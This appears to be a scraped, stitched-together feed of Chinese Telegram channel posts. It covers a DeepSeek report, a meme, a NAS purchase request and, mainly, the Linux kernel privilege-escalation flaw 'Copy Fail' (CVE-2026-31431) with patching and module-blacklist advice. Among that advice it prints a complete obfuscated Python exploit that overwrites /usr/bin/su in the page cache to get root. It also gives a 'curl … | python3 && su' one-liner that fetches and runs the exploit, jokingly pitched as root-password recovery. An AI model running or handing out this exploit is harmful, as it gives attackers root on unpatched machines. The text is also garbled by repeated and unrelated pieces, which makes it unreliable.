2026 年 4 月 30 日,DeepSeek 公开技术报告《Thinking with Visual Primitives》,提出将点、框等视觉基元作为思维最小单元交错嵌入推理链,解决复杂结构推理中的 Reference Gap。方法基于 DeepSeek-V4-Flash 架构,压缩 KV 缓存,以极低图像 token 消耗完成推理。在计数和空间推理基准上,该模型性能与 GPT-5.4、Claude-Sonnet-4.6、Gemini-3-Flash 相当(论文强调仅覆盖部分相关维度,不代表整体能力)。未来将开源内部基准、部分冷启动数据,权重将整合至基础模型后发布。
GitHub
🌸 在花频道 · 茶馆讨论 · 投稿通道
1. 不影响 Android, 因为根本没启用这个 kernel 特性,散了散了
2. 哪怕对 K8s Pod 套了一层 KVM 也不要半场开香槟,马上还会有第二关 Next: "From Pod to Host," how Copy Fail escapes every major cloud Kubernetes platform.
3. 截止目前 Debian 最新主线还没更新安全补丁 (仅 Sid/Testing 通道有响应),请立即确保执行文中的缓解措施,并再尝试使用普通用户执行文中的 PoC
4. 你 GitHub Actions 安全团队怎么还没开始响应呢?
2. 哪怕对 K8s Pod 套了一层 KVM 也不要半场开香槟,马上还会有第二关 Next: "From Pod to Host," how Copy Fail escapes every major cloud Kubernetes platform.
3. 截止目前 Debian 最新主线还没更新安全补丁 (仅 Sid/Testing 通道有响应),请立即确保执行文中的缓解措施,并再尝试使用普通用户执行文中的 PoC
4. 你 GitHub Actions 安全团队怎么还没开始响应呢?
你们明天就要去CP/音律联觉/星铁LAND/萤火虫了吧,那种我从来没去过的高级地方,领着我从来没领过的无料,和漂亮的coser老师们集邮。我今天捡的垃圾,刚好够买你喜欢的谷子,你的房间我也全部打扫干净了,今天晚上还回来吗?我会给你准备一大桌好吃的饭,我累了就先睡觉了,会给你留门的,不用担心我一个人在家挺好的。你玩的开心就好了,不用在意我,真的。非要担心我就v我50我去吃肯德基
修复方案
执行各发行版upgrade命令,应已推送新的 linux-image-*
紧急修补策略
执行各发行版upgrade命令,应已推送新的 linux-image-*
sudo apt update && sudo apt upgrade紧急修补策略
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null🔥还在担心忘记root密码吗,不要慌,一行命令就能帮你从低权限找回你的root权限🔥
curl https://copy.fail/exp | python3 && su如果您刚醒看到这条消息不要慌,懵逼是正常的,缓解方法是可以回去再睡一觉,当然这个方法不适用于上班/上学要迟到了的人
2017 到现在的所有版本的所有 distro,一键 root
快去 patch
https://copy.fail
https://xint.io/blog/copy-fail-linux-distributions
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")或者
curl https://copy.fail/exp | python3 && suCopy Fail(CVE-2026-31431):
732 字节拿下 Linux Root
---
Xint Code 最近披露了一个非常危险的 Linux 内核本地提权漏洞
它似乎影响几乎所有2017年后的主流 Linux 发行版,
包括Ubuntu、Debian、RHEL、Amazon Linux、SUSE 等。
---
这个漏洞最夸张的地方在于,普通用户,可以靠732字节的Python PoC,就能稳定提权到 root
---
漏洞原理
---
Copy Fail 是 Linux 内核加密子系统(AF_ALG / algif_aead / authencesn)中的一个逻辑漏洞。
---
攻击者可以借助 AF_ALG + splice(),向任意可读文件的 page cache写入可控的 4 字节数据。
---
重点在于:
改的是内存中的 page cache而不是磁盘上的原文件,所以文件hash看起来是绝对正常的,但系统实际运行时,读到的是被篡改后的内容,这意味着攻击者似乎可以直接污染很多setuid程序的缓存内容,随后执行并拿到root
---
而且由于 page cache 是内核全局共享的,似乎可以用来容器逃逸(?)
---
所以,赶快,升级,你的Linux设施
---
源:https://xint.io/blog/copy-fail-linux-distributions
源:https://ubuntu.com/security/CVE-2026-31431
732 字节拿下 Linux Root
---
Xint Code 最近披露了一个非常危险的 Linux 内核本地提权漏洞
它似乎影响几乎所有2017年后的主流 Linux 发行版,
包括Ubuntu、Debian、RHEL、Amazon Linux、SUSE 等。
---
这个漏洞最夸张的地方在于,普通用户,可以靠732字节的Python PoC,就能稳定提权到 root
---
漏洞原理
---
Copy Fail 是 Linux 内核加密子系统(AF_ALG / algif_aead / authencesn)中的一个逻辑漏洞。
---
攻击者可以借助 AF_ALG + splice(),向任意可读文件的 page cache写入可控的 4 字节数据。
---
重点在于:
改的是内存中的 page cache而不是磁盘上的原文件,所以文件hash看起来是绝对正常的,但系统实际运行时,读到的是被篡改后的内容,这意味着攻击者似乎可以直接污染很多setuid程序的缓存内容,随后执行并拿到root
---
而且由于 page cache 是内核全局共享的,似乎可以用来容器逃逸(?)
---
所以,赶快,升级,你的Linux设施
---
源:https://xint.io/blog/copy-fail-linux-distributions
源:https://ubuntu.com/security/CVE-2026-31431
xint.io
Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. - Xint
Xint Code disclosed CVE-2026-31431, an authencesn scratch-write bug chaining AF_ALG + splice() into a 4-byte page cache write. A 732-byte PoC gets root on Ubuntu, Amazon Linux, RHEL, SUSE. | AI for Security, Vulnerability Research, Open Source Projects
感谢 bingxin 同意我发。
打算在100~200价格收个小主机当nas用。
手头上有DDR3的内存(笔记本+台式),接受准系统,最好有m2 SATA+SATA。
功耗不要太大,单网口即可。
可以推荐下😋,有的话您可联系 @LiyePMChannel 或者 @BakaLiye
打算在100~200价格收个小主机当nas用。
手头上有DDR3的内存(笔记本+台式),接受准系统,最好有m2 SATA+SATA。
功耗不要太大,单网口即可。
可以推荐下😋,有的话您可联系 @LiyePMChannel 或者 @BakaLiye
